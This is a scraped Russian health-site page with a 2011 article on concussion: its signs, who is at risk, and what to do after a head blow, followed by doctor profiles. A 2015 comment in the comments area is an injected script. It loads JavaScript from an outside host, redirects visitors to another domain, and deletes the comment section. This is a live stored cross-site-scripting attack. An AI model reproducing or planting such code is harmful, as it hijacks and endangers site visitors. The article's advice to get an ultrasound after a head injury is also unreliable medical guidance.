Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Обухом по голове  >>  Обухом по голове
 
Обратная связь
 

Обухом по голове

Размер шрифта
17 октября 2011 06:50
  • google_analytics: false
  • Нравится

В голливудских фильмах достаточно один раз приложить тяжелым по затылку, чтобы герой потерял сознание. На самом деле даже от сильного удара по голове сознание теряют не всегда. А вот сотрясение мозга можно заработать даже от обыкновенного ушиба.

1

Вообще, сотрясение – это черепно-мозговая травма, после которой происходит кратковременный срыв функций мозга. 5% всех спортивных и 70% всех черепно-мозговых травм проходят с сотрясением мозга. Главные признаки сотрясения мозга – это потеря сознания, головная боль, шум в ушах, тошнота и нарушения сна.

Как следует из названия, травма происходит в результате того, что мозг сотрясается во время ушиба. Иногда одновременно с сотрясением вдавливаются или ломаются кости черепа. Еще одна опасность сотрясения – возможность кровоизлияния в мозг. От удара может разорваться сосуд между мозгом и черепной коробкой. Образуется отек, который будет увеличиваться, пока человек не впадет в кому. Именно так умер известный писатель Курт Воннегут.

Кто входит в группу риска?


  1. Чаще всего сотрясения бывают у велосипедистов, поэтому без шлема лучше не кататься ни на велосипеде, ни на роликах.

  2. Еще одна категория риска – маленькие дети. Установите поручни в ванной, это самое опасное в этом отношении помещение.

Что делать, если вы ударились головой?


  1. Сразу после удара нужно приложить к голове лед – это поможет снять возможное воспаление.

  2. После любого сильного ушиба по голове, даже если он кажется особо болезненным или серьезным, следует обратиться к врачу и сделать УЗИ. Необходимо определить степень сотрясения, ведь иногда ушиб настолько силен, что больным требуется госпитализация.

  3. Какого-то специального лечения сотрясения мозга нет, но примерно в 1% может потребоваться операция. Главное: покой, отказ от алкоголя и сильнодействующих лекарств. Обычно головная боль проходит в срок от суток до недели.


 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.